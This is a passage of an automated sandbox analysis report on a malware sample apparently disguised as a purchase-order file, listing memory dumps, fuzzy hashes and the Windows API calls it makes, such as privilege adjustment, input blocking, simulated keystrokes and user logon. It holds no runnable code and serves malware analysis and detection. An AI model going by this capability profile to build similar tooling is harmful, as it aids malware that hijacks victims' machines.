                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorMode$DiskFreeSpace
                        • String ID:
                        • API String ID: 1682464887-0
                        • Opcode ID: 62349af2dc17c7d9f63a7c9e94ab62a71af9bc37db0b8b6b910ac4893833be74
                        • Instruction ID: 06e58a85cafb008c0575657243bda0e0a3644bf8591c72da10fb8b5b399cf7fb
                        • Opcode Fuzzy Hash: 62349af2dc17c7d9f63a7c9e94ab62a71af9bc37db0b8b6b910ac4893833be74
                        • Instruction Fuzzy Hash: 1F214C35A10218EFCB00DFA5D895AEEFBB8FF49314F1480A9E906AB251DB319915CF50
                        APIs
                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002F704C
                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 002F708D
                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002F7098
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CloseControlCreateDeviceFileHandle
                        • String ID:
                        • API String ID: 33631002-0
                        • Opcode ID: 13b7ea212ed7c22eb0b731d56d41e38975590439eed67ab7bec9dfb860125f82
                        • Instruction ID: 800957b1b713bc5d1776ff9c15bcabcfd2eca69bd9cb450b0adc0d678f24fbc6
                        • Opcode Fuzzy Hash: 13b7ea212ed7c22eb0b731d56d41e38975590439eed67ab7bec9dfb860125f82
                        • Instruction Fuzzy Hash: 9C115271E10228BFEB118F94DC45BBFBBBCEB45B50F104165F900E7290D7705A018BA1
                        APIs
                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002EBE5A
                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002EBE71
                        • FreeSid.ADVAPI32(?), ref: 002EBE81
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AllocateCheckFreeInitializeMembershipToken
                        • String ID:
                        • API String ID: 3429775523-0
                        • Opcode ID: bf1a00078dfd4b12329b3e9ce82ab0b153bee0f9e7006812b7da2683e80a12a5
                        • Instruction ID: afe4f0fb07b8f96bab52400fe6f3b9c86c948b14062ca6f9e630b2ac6e064776
                        • Opcode Fuzzy Hash: bf1a00078dfd4b12329b3e9ce82ab0b153bee0f9e7006812b7da2683e80a12a5
                        • Instruction Fuzzy Hash: 84F01776A50209BFDF05DFF4DD89AEEBBBCEF08701F504869A602E2191E3709A448B10
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f133abc40e7a080c9a432f8caddd17d5db303bc10e1c7036f6151632f4c124ac
                        • Instruction ID: 35aa2eca91d857f04f1ba080a9e96ab4ddf9d0b1bda39e07fbc9624ad34c4f90
                        • Opcode Fuzzy Hash: f133abc40e7a080c9a432f8caddd17d5db303bc10e1c7036f6151632f4c124ac
                        • Instruction Fuzzy Hash: B722AD719252168FDB24DF58C490BFAB7F0FF14340F248169E85AAB351E770ACA5CB90
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 002FFD71
                        • FindClose.KERNEL32(00000000), ref: 002FFDA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Find$CloseFileFirst
                        • String ID:
                        • API String ID: 2295610775-0
                        • Opcode ID: 4250d609755a96ab85c922f679c352368666b6f2d089f5fdd9494580fc5b751d
                        • Instruction ID: 13972f8ea636305d78f807cbe69d9458d8213eee2ded7641a513d3f2ea61e5f1
                        • Opcode Fuzzy Hash: 4250d609755a96ab85c922f679c352368666b6f2d089f5fdd9494580fc5b751d
                        • Instruction Fuzzy Hash: 0411A1316202059FD710EF28D845A2AF7E8FF84324F00862EF9A99B291DB30EC158F81
                        APIs
                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0030C2E2,?,?,00000000,?), ref: 002FD73F
                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0030C2E2,?,?,00000000,?), ref: 002FD751
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorFormatLastMessage
                        • String ID:
                        • API String ID: 3479602957-0
                        • Opcode ID: 5a86ebca95673300da84ed1847c9cf8577c882fc6b2d0b6816ebf24aaa34d6cc
                        • Instruction ID: 38af82f8283cfbbc698b652cd6aadf870f0116c5b2c57c01b142e6317c32e51f
                        • Opcode Fuzzy Hash: 5a86ebca95673300da84ed1847c9cf8577c882fc6b2d0b6816ebf24aaa34d6cc
                        • Instruction Fuzzy Hash: 29F0823551032DABDB11AFA4DC89FEAB76DAF493A1F008525BA05D6181D6709950CBA0
                        APIs
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 002F4B89
                        • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 002F4B9C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: InputSendkeybd_event
                        • String ID:
                        • API String ID: 3536248340-0
                        • Opcode ID: 005ab0b1f9c007b8dc1fb1aa26832c6f1453c24a2be3a87ce6423c7a083df558
                        • Instruction ID: 804d5f4d899c0a2e9ba4a5d42843a1baae6f8e18039c8fd0580f753597c26673
                        • Opcode Fuzzy Hash: 005ab0b1f9c007b8dc1fb1aa26832c6f1453c24a2be3a87ce6423c7a083df558
                        • Instruction Fuzzy Hash: 6CF0907081034EAFEB069FA0C805BBEBBB4EF00309F00841AFD51A6192D3B9C615DF90
                        APIs
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002EB9EC), ref: 002EB8C5
                        • CloseHandle.KERNEL32(?,?,002EB9EC), ref: 002EB8D7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AdjustCloseHandlePrivilegesToken
                        • String ID:
                        • API String ID: 81990902-0
                        • Opcode ID: d6aa3eaded5203427e06460489cd03323a7038f26259b07fe005f0d101510780
                        • Instruction ID: 2e3112df81a39d313d1ec5d3d3168c5120bff183afde5235c347529c3576c815
                        • Opcode Fuzzy Hash: d6aa3eaded5203427e06460489cd03323a7038f26259b07fe005f0d101510780
                        • Instruction Fuzzy Hash: D3E0B672014611EFE7262B61FC89E777BEDFF04311F10892AF49A81570DB62ACA0DB10
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,002B125D,002D7A43,002B0F35,?,?,00000001), ref: 002D8E41
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 002D8E4A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 20987e4fa88172dfc6a44aaffe07e8aa93685cb4c284e4638ff1b52e81667ff3
                        • Instruction ID: 3989493f1ab456dee0119941481448322db98dfa4505d02c8f92feac9ebc497f
                        • Opcode Fuzzy Hash: 20987e4fa88172dfc6a44aaffe07e8aa93685cb4c284e4638ff1b52e81667ff3
                        • Instruction Fuzzy Hash: C9B09275044A08ABEA022BA1FC49B883F6CEB08B72F004010F61D450608B6358508E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BuffCharUpper
                        • String ID:
                        • API String ID: 3964851224-0
                        • Opcode ID: e3fca8206e172f11f838437c5eae00301c3b2239f278026fbcdd358180118424
                        • Instruction ID: 5105e6d5db86d1423beeb398fc1d8440a6cafb1a0d99909936df3e4b66022a36
                        • Opcode Fuzzy Hash: e3fca8206e172f11f838437c5eae00301c3b2239f278026fbcdd358180118424
                        • Instruction Fuzzy Hash: 319276706183418FD724DF18C490F6ABBE1BF88304F148A5DE98A8B3A2D771ED55CB92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9c1bca32d2181c64274b7184a594417270f1c959ac497676d77fb794014b778d
                        • Instruction ID: a59f6c26dee2afe248ccefc8426e9966081a5efa2191fd7a6597a347812afc61
                        • Opcode Fuzzy Hash: 9c1bca32d2181c64274b7184a594417270f1c959ac497676d77fb794014b778d
                        • Instruction Fuzzy Hash: DFB1E224D2AF504ED72396398831336B65CAFBB3C5F91D71BFC2A78D62EB2195934180
                        APIs
                        • BlockInput.USER32(00000001), ref: 00307057
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BlockInput
                        • String ID:
                        • API String ID: 3456056419-0
                        • Opcode ID: 5cd488e91dcfebe5a6ac77a56dbdd160e91b4aa5f7634c0dab7b2edbb712252f
                        • Instruction ID: 3ebfa0a506240496dbec27a55f74cfa55621558cb7088bb52be6c11a8e2586f2
                        • Opcode Fuzzy Hash: 5cd488e91dcfebe5a6ac77a56dbdd160e91b4aa5f7634c0dab7b2edbb712252f
                        • Instruction Fuzzy Hash: 94E04F766142049FC710EFA9D819E97F7ECAF98790F01842AFA45D7291DAB0F8148BA0
                        APIs
                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002F7DF8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: mouse_event
                        • String ID:
                        • API String ID: 2434400541-0
                        • Opcode ID: 47664bcc59d3c87d2f6ddca2c0828c3b956280af512190ed30eeae4807fdd82f
                        • Instruction ID: e0e7be8931f171f8382f442b4bbae4c0ada521cb8138f8599f3ef2cafca1cbc5
                        • Opcode Fuzzy Hash: 47664bcc59d3c87d2f6ddca2c0828c3b956280af512190ed30eeae4807fdd82f
                        • Instruction Fuzzy Hash: 22D09EA517C60F79FD190B209C2FF7A9109EB457C1FE456A9B301C60C1EFD068645435
                        APIs
                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,002EBA6A), ref: 002EBEB3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: LogonUser
                        • String ID:
                        • API String ID: 1244722697-0
                        • Opcode ID: ce6c41a1ae43391c2fca72003fad4fd1e4656b9529ad7305ac19917ce95783ce
                        • Instruction ID: 24ff60a36bdb54e8761f7d9b4d1cccef4eac4811730a301acaa7868da770ed4d
                        • Opcode Fuzzy Hash: ce6c41a1ae43391c2fca72003fad4fd1e4656b9529ad7305ac19917ce95783ce
                        • Instruction Fuzzy Hash: E5D09E321A464EAEDF025FA4ED06EAE3F6AEB04B01F448511FA15D50A1C775D531AB50
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: NameUser
                        • String ID:
                        • API String ID: 2645101109-0
                        • Opcode ID: e2c14c62675936d3f41bb9947bec909395ad448adbe51800ac8d355ca8970d60
                        • Instruction ID: f3fd9ae5e6a899317cbb902bc03670b5e5ded6b391d5b9a26f2517e72f0996fd
                        • Opcode Fuzzy Hash: e2c14c62675936d3f41bb9947bec909395ad448adbe51800ac8d355ca8970d60
                        • Instruction Fuzzy Hash: 5CC04CB140401DDFC716CB80D9859EFF7BCBB04300F104095A115E1000D7709B459B71
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 002D8E1F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: b182178899ba5af1ca446c0d18781840b0103311fb7d8b78e38b2bb20f973dd9
                        • Instruction ID: 6a7d788daba9d4f22214617e35c3aae103677b2365d143e242ff4b112ac7f882
                        • Opcode Fuzzy Hash: b182178899ba5af1ca446c0d18781840b0103311fb7d8b78e38b2bb20f973dd9
                        • Instruction Fuzzy Hash: 0CA0123000050CA78A011B51FC044447F5CD604260F004010F40C01021873358104981
                        APIs
                        • GetProcessHeap.KERNEL32(002D6AE9,003667D8,00000014), ref: 002DA937
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HeapProcess
                        • String ID:
                        • API String ID: 54951025-0
                        • Opcode ID: 7263d8b2391bc10d032a5b19226055df08d999ad4c8808011d8cc46a85639d89
                        • Instruction ID: a57e7653fcb218fc33ea9b59a7fdb5da5a0ba4ede4f4fcb5de8e5ddf5c4e853b
                        • Opcode Fuzzy Hash: 7263d8b2391bc10d032a5b19226055df08d999ad4c8808011d8cc46a85639d89
                        • Instruction Fuzzy Hash: 3FB012B07031028BD74D4B38BC9411A79DC574E301B01403D7407C2570DB308450DF00
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                        • Instruction ID: f3eec7e420af7b7b56b029dfd33046a2dafc2c7313a34e8abb9579f6bc2fba80
                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                        • Instruction Fuzzy Hash: 57C106722251A349DF2D4A39C47453EFAA15EA17B131A075FD8B3CBAD0EE24CD34D650
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                        • Instruction ID: fc6a0a5c8ddabf4fbd99dc5fb902fbde8d3e03a39e78116458d8dd876f5e15da
                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                        • Instruction Fuzzy Hash: 96C106722251934ADF2D4A39C47053EFAA15EA27B131A036FD4B3CBAD4EE24CD34D660
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                        • Instruction ID: 0cae4bbdcba5392c67a86bd45a4406ba34b3a1d5b5a32e5c1c82eb12259f073d
                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                        • Instruction Fuzzy Hash: BDC1197222919349DF2D4A39C4B063EFBA15AA17B571A076FD4B3CB2E0EE14CD34D650
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                        • Instruction ID: 07ccd109480b0c4b06d5f3bfd84b6378d1ff478d9164e10a3142e44c7117e2fd
                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
